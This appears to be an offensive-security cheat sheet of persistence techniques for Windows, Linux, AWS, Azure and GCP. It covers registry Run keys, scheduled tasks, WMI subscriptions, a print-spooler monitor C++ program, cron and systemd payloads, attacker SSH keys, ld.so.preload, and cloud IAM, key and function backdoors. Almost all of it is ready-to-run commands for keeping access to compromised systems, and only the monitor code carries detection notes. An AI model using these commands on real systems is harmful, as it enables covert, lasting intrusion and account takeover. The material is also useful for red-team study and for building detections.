# Windows Persistence
Common registry key locations are:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
To persist:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d C:\temp\payload.exe
User-level tasks:
schtasks /create /sc onlogon /tn updater /tr C:\temp\payload.exe
System-level tasks:
schtasks /create /sc onstart /ru SYSTEM /tn updater /tr C:\temp\payload.exe
Create and start the service:
sc create updater binPath= "C:\temp\payload.exe" start= auto
sc start updater
Copy the payload into the user Startup folder:
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
Fileless technique (WMI event subscription):
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter `
-Arguments @{Name="Updater";EventNamespace="root\cimv2";QueryLanguage="WQL";
Query="SELECT * FROM Win32_LogonSession"}
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer `
-Arguments @{Name="Updater";CommandLineTemplate="powershell -enc <PAYLOAD>"}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding `
-Arguments @{Filter=$filter;Consumer=$consumer}
The C2 must be a DLL.
Put the DLL in %systemroot%.
Compile and execute monitor.cpp within the environment as well:
#include "stdafx.h"
#include "Windows.h"
int main() {
  // Registers a print-spooler port monitor named "evilMonitor" whose
  // implementation DLL is evil64.dll, by calling AddMonitor at info level 2.
  // Defender notes: AddMonitor needs administrative rights, the registration
  // is persisted under HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors,
  // and the DLL is loaded by the spooler service (MITRE ATT&CK T1547.010);
  // a new subkey there, or an unexpected DLL inside spoolsv.exe, is the
  // artifact to alert on.
  MONITOR_INFO_2 monitorInfo;
  // Each buffer is sized to exactly fit its literal (11 chars + NUL).
  TCHAR env[12] = TEXT("Windows x64");   // becomes pEnvironment
  TCHAR name[12] = TEXT("evilMonitor");  // becomes pName (the registered monitor name)
  // Bare filename with no path: presumably resolved by the spooler from the
  // system directory, so the DLL must already be in place (the page says
  // %systemroot%) — confirm the exact lookup location.
  TCHAR dll[12] = TEXT("evil64.dll");
  monitorInfo.pName = name;
  monitorInfo.pEnvironment = env;
  monitorInfo.pDLLName = dll;
  // NULL server name = local machine; level 2 matches MONITOR_INFO_2.
  // The BOOL return value is not checked, so a failed registration is silent.
  AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
  return 0;
} // Code credit to ired.team
# Linux Persistence
Create a user cron entry to run the file every 5 minutes:
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/payload.sh") | crontab -
Create a root cron entry:
echo "* * * * * root /tmp/payload.sh" > /etc/cron.d/updater
Set permissions so cron will accept and run it:
chmod 644 /etc/cron.d/updater
Create a service file (root):
cat <<EOF > /etc/systemd/system/updater.service
[Unit]
Description=System Updater
[Service]
ExecStart=/tmp/payload
Restart=always
[Install]
WantedBy=multi-user.target
EOF
Enable and start:
systemctl daemon-reload
systemctl enable updater
systemctl start updater
Create a service file (user):
mkdir -p ~/.config/systemd/user
cat <<EOF > ~/.config/systemd/user/updater.service
[Unit]
Description=User Updater
[Service]
ExecStart=/tmp/payload
Restart=always
[Install]
WantedBy=default.target
EOF
Enable and start:
systemctl --user daemon-reload
systemctl --user enable updater
systemctl --user start updater
Append to .bashrc:
echo "/tmp/payload &" >> ~/.bashrc
Append to .bash_profile:
echo "/tmp/payload &" >> ~/.bash_profile
Global:
echo "/tmp/payload &" >> /etc/profile
NOT OPSEC SAFE
Add the attacker key to the user:
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
Add the key to root's authorized_keys:
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
Force-load a malicious shared object into processes.
Create the object, then register it for preloading:
gcc -shared -fPIC evil.c -o /tmp/evil.so
echo "/tmp/evil.so" >> /etc/ld.so.preload
# AWS Persistence
Create a new access key:
aws iam create-access-key --user-name compromised-user
Exfiltrate and store it.
Attach an admin policy:
aws iam attach-user-policy --user-name compromised-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Inline policy backdoor:
aws iam put-user-policy --user-name compromised-user --policy-name updater --policy-document file://policy.json
Modify the trust relationship:
aws iam update-assume-role-policy --role-name AdminRole --policy-document file://trust.json
Create a Lambda:
aws lambda create-function --function-name updater --runtime python3.9 --handler handler.lambda_handler --role arn:aws:iam::<acct>:role/AdminRole --zip-file fileb://payload.zip
Create a rule:
aws events put-rule --schedule-expression "rate(5 minutes)" --name updater
Attach it to the target:
aws events put-targets --rule updater --targets file://targets.json
Modify user data:
aws ec2 modify-instance-attribute --instance-id i-XXXX --user-data file://userdata.sh
# Azure Persistence
Create an app:
az ad app create --display-name updater
Add a secret:
az ad app credential reset --id <APP_ID>
Grant permissions:
az ad app permission add --id <APP_ID> --api 00000003-0000-0000-c000-000000000000 --api-permissions <perm>=Role
Create a service principal:
az ad sp create --id <APP_ID>
Assign the role:
az role assignment create --assignee <SP_ID> --role Owner --scope /subscriptions/<SUB_ID>
Create a runbook:
az automation runbook create --automation-account-name auto --resource-group rg --name updater --type PowerShell
Schedule execution:
az automation schedule create --name updater-sched
Assign an identity:
az vm identity assign --name vm01 --resource-group rg
Grant it privileges:
az role assignment create --assignee <IDENTITY_ID> --role Contributor --scope /subscriptions/<SUB_ID>
# GCP Persistence
Create the key:
gcloud iam service-accounts keys create key.json --iam-account svc@project.iam.gserviceaccount.com
Grant an account persistent access:
gcloud projects add-iam-policy-binding project-id --member serviceAccount:svc@project.iam.gserviceaccount.com --role roles/owner
Create a new function and schedule it:
gcloud functions deploy updater --runtime python39 --trigger-http --allow-unauthenticated
gcloud scheduler jobs create pubsub updater --schedule "*/5 * * * *" --topic updater-topic